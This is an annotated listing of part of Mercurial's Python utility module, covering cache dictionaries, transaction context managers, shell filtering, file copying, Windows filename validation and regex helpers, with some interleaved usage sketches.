909 912 >>> list(d2.keys()) # should still be in last-set order
910 913 ['b', 'a']
911 914 '''
912 915
913 916 def __setitem__(self, key, value):
914 917 if key in self:
915 918 del self[key]
916 919 super(sortdict, self).__setitem__(key, value)
917 920
918 921 if pycompat.ispypy:
919 922 # __setitem__() isn't called as of PyPy 5.8.0
920 923 def update(self, src):
921 924 if isinstance(src, dict):
922 925 src = src.iteritems()
923 926 for k, v in src:
924 927 self[k] = v
925 928
926 929 class cowdict(cow, dict):
927 930 """copy-on-write dict
928 931
929 932 Be sure to call d = d.preparewrite() before writing to d.
930 933
931 934 >>> a = cowdict()
932 935 >>> a is a.preparewrite()
933 936 True
934 937 >>> b = a.copy()
935 938 >>> b is a
936 939 True
937 940 >>> c = b.copy()
938 941 >>> c is a
939 942 True
940 943 >>> a = a.preparewrite()
941 944 >>> b is a
942 945 False
943 946 >>> a is a.preparewrite()
944 947 True
945 948 >>> c = c.preparewrite()
946 949 >>> b is c
947 950 False
948 951 >>> b is b.preparewrite()
949 952 True
950 953 """
951 954
952 955 class cowsortdict(cow, sortdict):
953 956 """copy-on-write sortdict
954 957
955 958 Be sure to call d = d.preparewrite() before writing to d.
956 959 """
957 960
958 961 class transactional(object):
959 962 """Base class for making a transactional type into a context manager."""
960 963 __metaclass__ = abc.ABCMeta
961 964
962 965 @abc.abstractmethod
963 966 def close(self):
964 967 """Successfully closes the transaction."""
965 968
966 969 @abc.abstractmethod
967 970 def release(self):
968 971 """Marks the end of the transaction.
969 972
970 973 If the transaction has not been closed, it will be aborted.
971 974 """
972 975
973 976 def __enter__(self):
974 977 return self
975 978
976 979 def __exit__(self, exc_type, exc_val, exc_tb):
977 980 try:
978 981 if exc_type is None:
979 982 self.close()
980 983 finally:
981 984 self.release()
982 985
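A minimal sketch of a hypothetical subclass (illustrative; not a real Mercurial transaction type):

    class demotransaction(transactional):
        def __init__(self):
            self.committed = False
        def close(self):
            self.committed = True
        def release(self):
            if not self.committed:
                pass            # abort/cleanup would happen here

    with demotransaction() as tr:
        pass                    # no exception: __exit__ calls close(), then release()
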
983 986 @contextlib.contextmanager
984 987 def acceptintervention(tr=None):
985 988 """A context manager that closes the transaction on InterventionRequired
986 989
987 990 If no transaction was provided, this simply runs the body and returns
988 991 """
989 992 if not tr:
990 993 yield
991 994 return
992 995 try:
993 996 yield
994 997 tr.close()
995 998 except error.InterventionRequired:
996 999 tr.close()
997 1000 raise
998 1001 finally:
999 1002 tr.release()
1000 1003
1001 1004 @contextlib.contextmanager
1002 1005 def nullcontextmanager():
1003 1006 yield
1004 1007
1005 1008 class _lrucachenode(object):
1006 1009 """A node in a doubly linked list.
1007 1010
1008 1011 Holds a reference to nodes on either side as well as a key-value
1009 1012 pair for the dictionary entry.
1010 1013 """
1011 1014 __slots__ = (u'next', u'prev', u'key', u'value')
1012 1015
1013 1016 def __init__(self):
1014 1017 self.next = None
1015 1018 self.prev = None
1016 1019
1017 1020 self.key = _notset
1018 1021 self.value = None
1019 1022
1020 1023 def markempty(self):
1021 1024 """Mark the node as emptied."""
1022 1025 self.key = _notset
1023 1026
1024 1027 class lrucachedict(object):
1025 1028 """Dict that caches most recent accesses and sets.
1026 1029
1027 1030 The dict consists of an actual backing dict - indexed by original
1028 1031 key - and a doubly linked circular list defining the order of entries in
1029 1032 the cache.
1030 1033
1031 1034 The head node is the newest entry in the cache. If the cache is full,
1032 1035 we recycle head.prev and make it the new head. Cache accesses result in
1033 1036 the node being moved to before the existing head and being marked as the
1034 1037 new head node.
1035 1038 """
1036 1039 def __init__(self, max):
1037 1040 self._cache = {}
1038 1041
1039 1042 self._head = head = _lrucachenode()
1040 1043 head.prev = head
1041 1044 head.next = head
1042 1045 self._size = 1
1043 1046 self._capacity = max
1044 1047
1045 1048 def __len__(self):
1046 1049 return len(self._cache)
1047 1050
1048 1051 def __contains__(self, k):
1049 1052 return k in self._cache
1050 1053
1051 1054 def __iter__(self):
1052 1055 # We don't have to iterate in cache order, but why not.
1053 1056 n = self._head
1054 1057 for i in range(len(self._cache)):
1055 1058 yield n.key
1056 1059 n = n.next
1057 1060
1058 1061 def __getitem__(self, k):
1059 1062 node = self._cache[k]
1060 1063 self._movetohead(node)
1061 1064 return node.value
1062 1065
1063 1066 def __setitem__(self, k, v):
1064 1067 node = self._cache.get(k)
1065 1068 # Replace existing value and mark as newest.
1066 1069 if node is not None:
1067 1070 node.value = v
1068 1071 self._movetohead(node)
1069 1072 return
1070 1073
1071 1074 if self._size < self._capacity:
1072 1075 node = self._addcapacity()
1073 1076 else:
1074 1077 # Grab the last/oldest item.
1075 1078 node = self._head.prev
1076 1079
1077 1080 # At capacity. Kill the old entry.
1078 1081 if node.key is not _notset:
1079 1082 del self._cache[node.key]
1080 1083
1081 1084 node.key = k
1082 1085 node.value = v
1083 1086 self._cache[k] = node
1084 1087 # And mark it as newest entry. No need to adjust order since it
1085 1088 # is already self._head.prev.
1086 1089 self._head = node
1087 1090
1088 1091 def __delitem__(self, k):
1089 1092 node = self._cache.pop(k)
1090 1093 node.markempty()
1091 1094
1092 1095 # Temporarily mark as newest item before re-adjusting head to make
1093 1096 # this node the oldest item.
1094 1097 self._movetohead(node)
1095 1098 self._head = node.next
1096 1099
1097 1100 # Additional dict methods.
1098 1101
1099 1102 def get(self, k, default=None):
1100 1103 try:
1101 1104 return self._cache[k].value
1102 1105 except KeyError:
1103 1106 return default
1104 1107
1105 1108 def clear(self):
1106 1109 n = self._head
1107 1110 while n.key is not _notset:
1108 1111 n.markempty()
1109 1112 n = n.next
1110 1113
1111 1114 self._cache.clear()
1112 1115
1113 1116 def copy(self):
1114 1117 result = lrucachedict(self._capacity)
1115 1118 n = self._head.prev
1116 1119 # Iterate in oldest-to-newest order, so the copy has the right ordering
1117 1120 for i in range(len(self._cache)):
1118 1121 result[n.key] = n.value
1119 1122 n = n.prev
1120 1123 return result
1121 1124
1122 1125 def _movetohead(self, node):
1123 1126 """Mark a node as the newest, making it the new head.
1124 1127
1125 1128 When a node is accessed, it becomes the freshest entry in the LRU
1126 1129 list, which is denoted by self._head.
1127 1130
1128 1131 Visually, let's make ``N`` the new head node (* denotes head):
1129 1132
1130 1133 previous/oldest <-> head <-> next/next newest
1131 1134
1132 1135 ----<->--- A* ---<->-----
1133 1136 | |
1134 1137 E <-> D <-> N <-> C <-> B
1135 1138
1136 1139 To:
1137 1140
1138 1141 ----<->--- N* ---<->-----
1139 1142 | |
1140 1143 E <-> D <-> C <-> B <-> A
1141 1144
1142 1145 This requires the following moves:
1143 1146
1144 1147 C.next = D (node.prev.next = node.next)
1145 1148 D.prev = C (node.next.prev = node.prev)
1146 1149 E.next = N (head.prev.next = node)
1147 1150 N.prev = E (node.prev = head.prev)
1148 1151 N.next = A (node.next = head)
1149 1152 A.prev = N (head.prev = node)
1150 1153 """
1151 1154 head = self._head
1152 1155 # C.next = D
1153 1156 node.prev.next = node.next
1154 1157 # D.prev = C
1155 1158 node.next.prev = node.prev
1156 1159 # N.prev = E
1157 1160 node.prev = head.prev
1158 1161 # N.next = A
1159 1162 # It is tempting to do just "head" here, however if node is
1160 1163 # adjacent to head, this will do bad things.
1161 1164 node.next = head.prev.next
1162 1165 # E.next = N
1163 1166 node.next.prev = node
1164 1167 # A.prev = N
1165 1168 node.prev.next = node
1166 1169
1167 1170 self._head = node
1168 1171
1169 1172 def _addcapacity(self):
1170 1173 """Add a node to the circular linked list.
1171 1174
1172 1175 The new node is inserted before the head node.
1173 1176 """
1174 1177 head = self._head
1175 1178 node = _lrucachenode()
1176 1179 head.prev.next = node
1177 1180 node.prev = head.prev
1178 1181 node.next = head
1179 1182 head.prev = node
1180 1183 self._size += 1
1181 1184 return node
1182 1185
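A minimal usage sketch (illustrative only): the least recently used entry is recycled once capacity is reached.

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']                      # access makes 'a' the newest entry
    d['c'] = 3                  # recycles 'b', now the oldest entry
    assert 'b' not in d and 'a' in d and 'c' in d
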
1183 1186 def lrucachefunc(func):
1184 1187 '''cache most recent results of function calls'''
1185 1188 cache = {}
1186 1189 order = collections.deque()
1187 1190 if func.__code__.co_argcount == 1:
1188 1191 def f(arg):
1189 1192 if arg not in cache:
1190 1193 if len(cache) > 20:
1191 1194 del cache[order.popleft()]
1192 1195 cache[arg] = func(arg)
1193 1196 else:
1194 1197 order.remove(arg)
1195 1198 order.append(arg)
1196 1199 return cache[arg]
1197 1200 else:
1198 1201 def f(*args):
1199 1202 if args not in cache:
1200 1203 if len(cache) > 20:
1201 1204 del cache[order.popleft()]
1202 1205 cache[args] = func(*args)
1203 1206 else:
1204 1207 order.remove(args)
1205 1208 order.append(args)
1206 1209 return cache[args]
1207 1210
1208 1211 return f
1209 1212
1210 1213 class propertycache(object):
1211 1214 def __init__(self, func):
1212 1215 self.func = func
1213 1216 self.name = func.__name__
1214 1217 def __get__(self, obj, type=None):
1215 1218 result = self.func(obj)
1216 1219 self.cachevalue(obj, result)
1217 1220 return result
1218 1221
1219 1222 def cachevalue(self, obj, value):
1220 1223 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1221 1224 obj.__dict__[self.name] = value
1222 1225
1223 1226 def clearcachedproperty(obj, prop):
1224 1227 '''clear a cached property value, if one has been set'''
1225 1228 if prop in obj.__dict__:
1226 1229 del obj.__dict__[prop]
1227 1230
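A minimal sketch (illustrative): the descriptor computes once, then the cached value in obj.__dict__ shadows it until cleared.

    class repoish(object):
        computed = 0
        @propertycache
        def expensive(self):
            repoish.computed += 1
            return 42

    r = repoish()
    assert r.expensive == 42 and r.expensive == 42
    assert repoish.computed == 1        # second access hit obj.__dict__
    clearcachedproperty(r, 'expensive') # next access recomputes
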
1228 1231 def pipefilter(s, cmd):
1229 1232 '''filter string S through command CMD, returning its output'''
1230 1233 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1231 1234 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1232 1235 pout, perr = p.communicate(s)
1233 1236 return pout
1234 1237
1235 1238 def tempfilter(s, cmd):
1236 1239 '''filter string S through a pair of temporary files with CMD.
1237 1240 CMD is used as a template to create the real command to be run,
1238 1241 with the strings INFILE and OUTFILE replaced by the real names of
1239 1242 the temporary files generated.'''
1240 1243 inname, outname = None, None
1241 1244 try:
1242 1245 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1243 1246 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1244 1247 fp.write(s)
1245 1248 fp.close()
1246 1249 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1247 1250 os.close(outfd)
1248 1251 cmd = cmd.replace('INFILE', inname)
1249 1252 cmd = cmd.replace('OUTFILE', outname)
1250 1253 code = os.system(cmd)
1251 1254 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1252 1255 code = 0
1253 1256 if code:
1254 1257 raise Abort(_("command '%s' failed: %s") %
1255 1258 (cmd, explainexit(code)))
1256 1259 return readfile(outname)
1257 1260 finally:
1258 1261 try:
1259 1262 if inname:
1260 1263 os.unlink(inname)
1261 1264 except OSError:
1262 1265 pass
1263 1266 try:
1264 1267 if outname:
1265 1268 os.unlink(outname)
1266 1269 except OSError:
1267 1270 pass
1268 1271
1269 1272 filtertable = {
1270 1273 'tempfile:': tempfilter,
1271 1274 'pipe:': pipefilter,
1272 1275 }
1273 1276
1274 1277 def filter(s, cmd):
1275 1278 "filter a string through a command that transforms its input to its output"
1276 1279 for name, fn in filtertable.iteritems():
1277 1280 if cmd.startswith(name):
1278 1281 return fn(s, cmd[len(name):].lstrip())
1279 1282 return pipefilter(s, cmd)
1280 1283
1281 1284 def binary(s):
1282 1285 """return true if a string is binary data"""
1283 1286 return bool(s and '\0' in s)
1284 1287
1285 1288 def increasingchunks(source, min=1024, max=65536):
1286 1289 '''return no less than min bytes per chunk while data remains,
1287 1290 doubling min after each chunk until it reaches max'''
1288 1291 def log2(x):
1289 1292 if not x:
1290 1293 return 0
1291 1294 i = 0
1292 1295 while x:
1293 1296 x >>= 1
1294 1297 i += 1
1295 1298 return i - 1
1296 1299
1297 1300 buf = []
1298 1301 blen = 0
1299 1302 for chunk in source:
1300 1303 buf.append(chunk)
1301 1304 blen += len(chunk)
1302 1305 if blen >= min:
1303 1306 if min < max:
1304 1307 min = min << 1
1305 1308 nmin = 1 << log2(blen)
1306 1309 if nmin > min:
1307 1310 min = nmin
1308 1311 if min > max:
1309 1312 min = max
1310 1313 yield ''.join(buf)
1311 1314 blen = 0
1312 1315 buf = []
1313 1316 if buf:
1314 1317 yield ''.join(buf)
1315 1318
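A minimal sketch (illustrative): ten 500-byte chunks get regrouped so each emitted chunk meets the current minimum, which doubles as output proceeds.

    source = (b'x' * 500 for _ in range(10))
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    assert sum(sizes) == 5000           # here sizes == [1500, 2500, 1000]
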
1316 1319 Abort = error.Abort
1317 1320
1318 1321 def always(fn):
1319 1322 return True
1320 1323
1321 1324 def never(fn):
1322 1325 return False
1323 1326
1324 1327 def nogc(func):
1325 1328 """disable garbage collector
1326 1329
1327 1330 Python's garbage collector triggers a GC each time a certain number of
1328 1331 container objects (the number being defined by gc.get_threshold()) are
1329 1332 allocated even when marked not to be tracked by the collector. Tracking has
1330 1333 no effect on when GCs are triggered, only on what objects the GC looks
1331 1334 into. As a workaround, disable GC while building complex (huge)
1332 1335 containers.
1333 1336
1334 1337 This garbage collector issue has been fixed in 2.7, but it still affects
1335 1338 CPython's performance.
1336 1339 """
1337 1340 def wrapper(*args, **kwargs):
1338 1341 gcenabled = gc.isenabled()
1339 1342 gc.disable()
1340 1343 try:
1341 1344 return func(*args, **kwargs)
1342 1345 finally:
1343 1346 if gcenabled:
1344 1347 gc.enable()
1345 1348 return wrapper
1346 1349
1347 1350 if pycompat.ispypy:
1348 1351 # PyPy runs slower with gc disabled
1349 1352 nogc = lambda x: x
1350 1353
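A minimal sketch (illustrative): the collector is disabled only for the duration of the decorated call, and nogc is an identity function on PyPy per the override above.

    import gc
    @nogc
    def buildbig():
        return [{i: i} for i in range(1000)]

    gc.enable()
    buildbig()
    assert gc.isenabled()       # re-enabled (or never disabled, on PyPy)
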
1351 1354 def pathto(root, n1, n2):
1352 1355 '''return the relative path from one place to another.
1353 1356 root should use os.sep to separate directories
1354 1357 n1 should use os.sep to separate directories
1355 1358 n2 should use "/" to separate directories
1356 1359 returns an os.sep-separated path.
1357 1360
1358 1361 If n1 is a relative path, it's assumed it's
1359 1362 relative to root.
1360 1363 n2 should always be relative to root.
1361 1364 '''
1362 1365 if not n1:
1363 1366 return localpath(n2)
1364 1367 if os.path.isabs(n1):
1365 1368 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1366 1369 return os.path.join(root, localpath(n2))
1367 1370 n2 = '/'.join((pconvert(root), n2))
1368 1371 a, b = splitpath(n1), n2.split('/')
1369 1372 a.reverse()
1370 1373 b.reverse()
1371 1374 while a and b and a[-1] == b[-1]:
1372 1375 a.pop()
1373 1376 b.pop()
1374 1377 b.reverse()
1375 1378 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1376 1379
1377 1380 def mainfrozen():
1378 1381 """return True if we are a frozen executable.
1379 1382
1380 1383 The code supports py2exe (most common, Windows only) and tools/freeze
1381 1384 (portable, not much used).
1382 1385 """
1383 1386 return (safehasattr(sys, "frozen") or # new py2exe
1384 1387 safehasattr(sys, "importers") or # old py2exe
1385 1388 imp.is_frozen(u"__main__")) # tools/freeze
1386 1389
1387 1390 # the location of data files matching the source code
1388 1391 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1389 1392 # executable version (py2exe) doesn't support __file__
1390 1393 datapath = os.path.dirname(pycompat.sysexecutable)
1391 1394 else:
1392 1395 datapath = os.path.dirname(pycompat.fsencode(__file__))
1393 1396
1394 1397 i18n.setdatapath(datapath)
1395 1398
1396 1399 _hgexecutable = None
1397 1400
1398 1401 def hgexecutable():
1399 1402 """return location of the 'hg' executable.
1400 1403
1401 1404 Defaults to $HG or 'hg' in the search path.
1402 1405 """
1403 1406 if _hgexecutable is None:
1404 1407 hg = encoding.environ.get('HG')
1405 1408 mainmod = sys.modules[pycompat.sysstr('__main__')]
1406 1409 if hg:
1407 1410 _sethgexecutable(hg)
1408 1411 elif mainfrozen():
1409 1412 if getattr(sys, 'frozen', None) == 'macosx_app':
1410 1413 # Env variable set by py2app
1411 1414 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1412 1415 else:
1413 1416 _sethgexecutable(pycompat.sysexecutable)
1414 1417 elif (os.path.basename(
1415 1418 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1416 1419 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1417 1420 else:
1418 1421 exe = findexe('hg') or os.path.basename(sys.argv[0])
1419 1422 _sethgexecutable(exe)
1420 1423 return _hgexecutable
1421 1424
1422 1425 def _sethgexecutable(path):
1423 1426 """set location of the 'hg' executable"""
1424 1427 global _hgexecutable
1425 1428 _hgexecutable = path
1426 1429
1427 1430 def _isstdout(f):
1428 1431 fileno = getattr(f, 'fileno', None)
1429 1432 try:
1430 1433 return fileno and fileno() == sys.__stdout__.fileno()
1431 1434 except io.UnsupportedOperation:
1432 1435 return False # fileno() raised UnsupportedOperation
1433 1436
1434 1437 def shellenviron(environ=None):
1435 1438 """return environ with optional override, useful for shelling out"""
1436 1439 def py2shell(val):
1437 1440 'convert python object into string that is useful to shell'
1438 1441 if val is None or val is False:
1439 1442 return '0'
1440 1443 if val is True:
1441 1444 return '1'
1442 1445 return pycompat.bytestr(val)
1443 1446 env = dict(encoding.environ)
1444 1447 if environ:
1445 1448 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1446 1449 env['HG'] = hgexecutable()
1447 1450 return env
1448 1451
1449 1452 def system(cmd, environ=None, cwd=None, out=None):
1450 1453 '''enhanced shell command execution.
1451 1454 run with the environment possibly modified, possibly in a different dir.
1452 1455
1453 1456 if out is specified, it is assumed to be a file-like object that has a
1454 1457 write() method. stdout and stderr will be redirected to out.'''
1455 1458 try:
1456 1459 stdout.flush()
1457 1460 except Exception:
1458 1461 pass
1459 1462 cmd = quotecommand(cmd)
1460 1463 env = shellenviron(environ)
1461 1464 if out is None or _isstdout(out):
1462 1465 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1463 1466 env=env, cwd=cwd)
1464 1467 else:
1465 1468 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1466 1469 env=env, cwd=cwd, stdout=subprocess.PIPE,
1467 1470 stderr=subprocess.STDOUT)
1468 1471 for line in iter(proc.stdout.readline, ''):
1469 1472 out.write(line)
1470 1473 proc.wait()
1471 1474 rc = proc.returncode
1472 1475 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1473 1476 rc = 0
1474 1477 return rc
1475 1478
1476 1479 def checksignature(func):
1477 1480 '''wrap a function with code to check for calling errors'''
1478 1481 def check(*args, **kwargs):
1479 1482 try:
1480 1483 return func(*args, **kwargs)
1481 1484 except TypeError:
1482 1485 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1483 1486 raise error.SignatureError
1484 1487 raise
1485 1488
1486 1489 return check
1487 1490
1488 1491 # a whitelist of known filesystems where hardlinks work reliably
1489 1492 _hardlinkfswhitelist = {
1490 1493 'btrfs',
1491 1494 'ext2',
1492 1495 'ext3',
1493 1496 'ext4',
1494 1497 'hfs',
1495 1498 'jfs',
1496 1499 'NTFS',
1497 1500 'reiserfs',
1498 1501 'tmpfs',
1499 1502 'ufs',
1500 1503 'xfs',
1501 1504 'zfs',
1502 1505 }
1503 1506
1504 1507 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1505 1508 '''copy a file, preserving mode and optionally other stat info like
1506 1509 atime/mtime
1507 1510
1508 1511 checkambig argument is used with filestat, and is useful only if
1509 1512 destination file is guarded by any lock (e.g. repo.lock or
1510 1513 repo.wlock).
1511 1514
1512 1515 copystat and checkambig should be exclusive.
1513 1516 '''
1514 1517 assert not (copystat and checkambig)
1515 1518 oldstat = None
1516 1519 if os.path.lexists(dest):
1517 1520 if checkambig:
1518 1521 oldstat = checkambig and filestat.frompath(dest)
1519 1522 unlink(dest)
1520 1523 if hardlink:
1521 1524 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1522 1525 # unless we are confident that dest is on a whitelisted filesystem.
1523 1526 try:
1524 1527 fstype = getfstype(os.path.dirname(dest))
1525 1528 except OSError:
1526 1529 fstype = None
1527 1530 if fstype not in _hardlinkfswhitelist:
1528 1531 hardlink = False
1529 1532 if hardlink:
1530 1533 try:
1531 1534 oslink(src, dest)
1532 1535 return
1533 1536 except (IOError, OSError):
1534 1537 pass # fall back to normal copy
1535 1538 if os.path.islink(src):
1536 1539 os.symlink(os.readlink(src), dest)
1537 1540 # copytime is ignored for symlinks, but in general copytime isn't needed
1538 1541 # for them anyway
1539 1542 else:
1540 1543 try:
1541 1544 shutil.copyfile(src, dest)
1542 1545 if copystat:
1543 1546 # copystat also copies mode
1544 1547 shutil.copystat(src, dest)
1545 1548 else:
1546 1549 shutil.copymode(src, dest)
1547 1550 if oldstat and oldstat.stat:
1548 1551 newstat = filestat.frompath(dest)
1549 1552 if newstat.isambig(oldstat):
1550 1553 # stat of the copied file is ambiguous relative to the original one
1551 1554 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1552 1555 os.utime(dest, (advanced, advanced))
1553 1556 except shutil.Error as inst:
1554 1557 raise Abort(str(inst))
1555 1558
1556 1559 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1557 1560 """Copy a directory tree using hardlinks if possible."""
1558 1561 num = 0
1559 1562
1560 1563 gettopic = lambda: hardlink and _('linking') or _('copying')
1561 1564
1562 1565 if os.path.isdir(src):
1563 1566 if hardlink is None:
1564 1567 hardlink = (os.stat(src).st_dev ==
1565 1568 os.stat(os.path.dirname(dst)).st_dev)
1566 1569 topic = gettopic()
1567 1570 os.mkdir(dst)
1568 1571 for name, kind in listdir(src):
1569 1572 srcname = os.path.join(src, name)
1570 1573 dstname = os.path.join(dst, name)
1571 1574 def nprog(t, pos):
1572 1575 if pos is not None:
1573 1576 return progress(t, pos + num)
1574 1577 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1575 1578 num += n
1576 1579 else:
1577 1580 if hardlink is None:
1578 1581 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1579 1582 os.stat(os.path.dirname(dst)).st_dev)
1580 1583 topic = gettopic()
1581 1584
1582 1585 if hardlink:
1583 1586 try:
1584 1587 oslink(src, dst)
1585 1588 except (IOError, OSError):
1586 1589 hardlink = False
1587 1590 shutil.copy(src, dst)
1588 1591 else:
1589 1592 shutil.copy(src, dst)
1590 1593 num += 1
1591 1594 progress(topic, num)
1592 1595 progress(topic, None)
1593 1596
1594 1597 return hardlink, num
1595 1598
1596 1599 _winreservednames = {
1597 1600 'con', 'prn', 'aux', 'nul',
1598 1601 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1599 1602 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1600 1603 }
1601 1604 _winreservedchars = ':*?"<>|'
1602 1605 def checkwinfilename(path):
1603 1606 r'''Check that the base-relative path is a valid filename on Windows.
1604 1607 Returns None if the path is ok, or a UI string describing the problem.
1605 1608
1606 1609 >>> checkwinfilename(b"just/a/normal/path")
1607 1610 >>> checkwinfilename(b"foo/bar/con.xml")
1608 1611 "filename contains 'con', which is reserved on Windows"
1609 1612 >>> checkwinfilename(b"foo/con.xml/bar")
1610 1613 "filename contains 'con', which is reserved on Windows"
1611 1614 >>> checkwinfilename(b"foo/bar/xml.con")
1612 1615 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1613 1616 "filename contains 'AUX', which is reserved on Windows"
1614 1617 >>> checkwinfilename(b"foo/bar/bla:.txt")
1615 1618 "filename contains ':', which is reserved on Windows"
1616 1619 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1617 1620 "filename contains '\\x07', which is invalid on Windows"
1618 1621 >>> checkwinfilename(b"foo/bar/bla ")
1619 1622 "filename ends with ' ', which is not allowed on Windows"
1620 1623 >>> checkwinfilename(b"../bar")
1621 1624 >>> checkwinfilename(b"foo\\")
1622 1625 "filename ends with '\\', which is invalid on Windows"
1623 1626 >>> checkwinfilename(b"foo\\/bar")
1624 1627 "directory name ends with '\\', which is invalid on Windows"
1625 1628 '''
1626 1629 if path.endswith('\\'):
1627 1630 return _("filename ends with '\\', which is invalid on Windows")
1628 1631 if '\\/' in path:
1629 1632 return _("directory name ends with '\\', which is invalid on Windows")
1630 1633 for n in path.replace('\\', '/').split('/'):
1631 1634 if not n:
1632 1635 continue
1633 1636 for c in _filenamebytestr(n):
1634 1637 if c in _winreservedchars:
1635 1638 return _("filename contains '%s', which is reserved "
1636 1639 "on Windows") % c
1637 1640 if ord(c) <= 31:
1638 1641 return _("filename contains '%s', which is invalid "
1639 1642 "on Windows") % escapestr(c)
1640 1643 base = n.split('.')[0]
1641 1644 if base and base.lower() in _winreservednames:
1642 1645 return _("filename contains '%s', which is reserved "
1643 1646 "on Windows") % base
1644 1647 t = n[-1:]
1645 1648 if t in '. ' and n not in '..':
1646 1649 return _("filename ends with '%s', which is not allowed "
1647 1650 "on Windows") % t
1648 1651
1649 1652 if pycompat.iswindows:
1650 1653 checkosfilename = checkwinfilename
1651 1654 timer = time.clock
1652 1655 else:
1653 1656 checkosfilename = platform.checkosfilename
1654 1657 timer = time.time
1655 1658
1656 1659 if safehasattr(time, "perf_counter"):
1657 1660 timer = time.perf_counter
1658 1661
1659 1662 def makelock(info, pathname):
1660 1663 try:
1661 1664 return os.symlink(info, pathname)
1662 1665 except OSError as why:
1663 1666 if why.errno == errno.EEXIST:
1664 1667 raise
1665 1668 except AttributeError: # no symlink in os
1666 1669 pass
1667 1670
1668 1671 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1669 1672 os.write(ld, info)
1670 1673 os.close(ld)
1671 1674
1672 1675 def readlock(pathname):
1673 1676 try:
1674 1677 return os.readlink(pathname)
1675 1678 except OSError as why:
1676 1679 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1677 1680 raise
1678 1681 except AttributeError: # no symlink in os
1679 1682 pass
1680 1683 fp = posixfile(pathname)
1681 1684 r = fp.read()
1682 1685 fp.close()
1683 1686 return r
1684 1687
1685 1688 def fstat(fp):
1686 1689 '''stat file object that may not have fileno method.'''
1687 1690 try:
1688 1691 return os.fstat(fp.fileno())
1689 1692 except AttributeError:
1690 1693 return os.stat(fp.name)
1691 1694
1692 1695 # File system features
1693 1696
1694 1697 def fscasesensitive(path):
1695 1698 """
1696 1699 Return true if the given path is on a case-sensitive filesystem
1697 1700
1698 1701 Requires a path (like /foo/.hg) ending with a foldable final
1699 1702 directory component.
1700 1703 """
1701 1704 s1 = os.lstat(path)
1702 1705 d, b = os.path.split(path)
1703 1706 b2 = b.upper()
1704 1707 if b == b2:
1705 1708 b2 = b.lower()
1706 1709 if b == b2:
1707 1710 return True # no evidence against case sensitivity
1708 1711 p2 = os.path.join(d, b2)
1709 1712 try:
1710 1713 s2 = os.lstat(p2)
1711 1714 if s2 == s1:
1712 1715 return False
1713 1716 return True
1714 1717 except OSError:
1715 1718 return True
1716 1719
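# For example, on a typical case-insensitive filesystem (illustrative
# only; the result depends on where the path actually lives):
#
#   fscasesensitive(b'/Volumes/hfs/repo/.hg')    # -> False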
1717 1720 try:
1718 1721 import re2
1719 1722 _re2 = None
1720 1723 except ImportError:
1721 1724 _re2 = False
1722 1725
1723 1726 class _re(object):
1724 1727 def _checkre2(self):
1725 1728 global _re2
1726 1729 try:
1727 1730 # check if match works, see issue3964
1728 1731 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1729 1732 except ImportError:
1730 1733 _re2 = False
1731 1734
1732 1735 def compile(self, pat, flags=0):
1733 1736 '''Compile a regular expression, using re2 if possible
1734 1737
1735 1738 For best performance, use only re2-compatible regexp features. The
1736 1739 only flags from the re module that are re2-compatible are
1737 1740 IGNORECASE and MULTILINE.'''
1738 1741 if _re2 is None:
1739 1742 self._checkre2()
1740 1743 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1741 1744 if flags & remod.IGNORECASE:
1742 1745 pat = '(?i)' + pat
1743 1746 if flags & remod.MULTILINE:
1744 1747 pat = '(?m)' + pat
1745 1748 try:
1746 1749 return re2.compile(pat)
1747 1750 except re2.error:
1748 1751 pass
1749 1752 return remod.compile(pat, flags)
1750 1753
1751 1754 @propertycache
1752 1755 def escape(self):
1753 1756 '''Return the version of escape corresponding to self.compile.
1754 1757
1755 1758 This is imperfect because whether re2 or re is used for a particular
1756 1759 function depends on the flags, etc, but it's the best we can do.
1757 1760 '''
1758 1761 global _re2
1759 1762 if _re2 is None:
1760 1763 self._checkre2()
1761 1764 if _re2:
1762 1765 return re2.escape
1763 1766 else:
1764 1767 return remod.escape
1765 1768
1766 1769 re = _re()
1767 1770
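# Usage sketch: the compiled pattern transparently falls back to the
# stdlib 're' module when re2 is unavailable or the flags aren't
# re2-compatible:
#
#   >>> bool(re.compile(br'a.+b', remod.IGNORECASE).search(b'xAYZbx'))
#   True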
1768 1771 _fspathcache = {}
1769 1772 def fspath(name, root):
1770 1773 '''Get name in the case stored in the filesystem
1771 1774
1772 1775 The name should be relative to root, and be normcase-ed for efficiency.
1773 1776
1774 1777 Note that this function is unnecessary, and should not be
1775 1778 called, for case-sensitive filesystems (simply because it's expensive).
1776 1779
1777 1780 The root should be normcase-ed, too.
1778 1781 '''
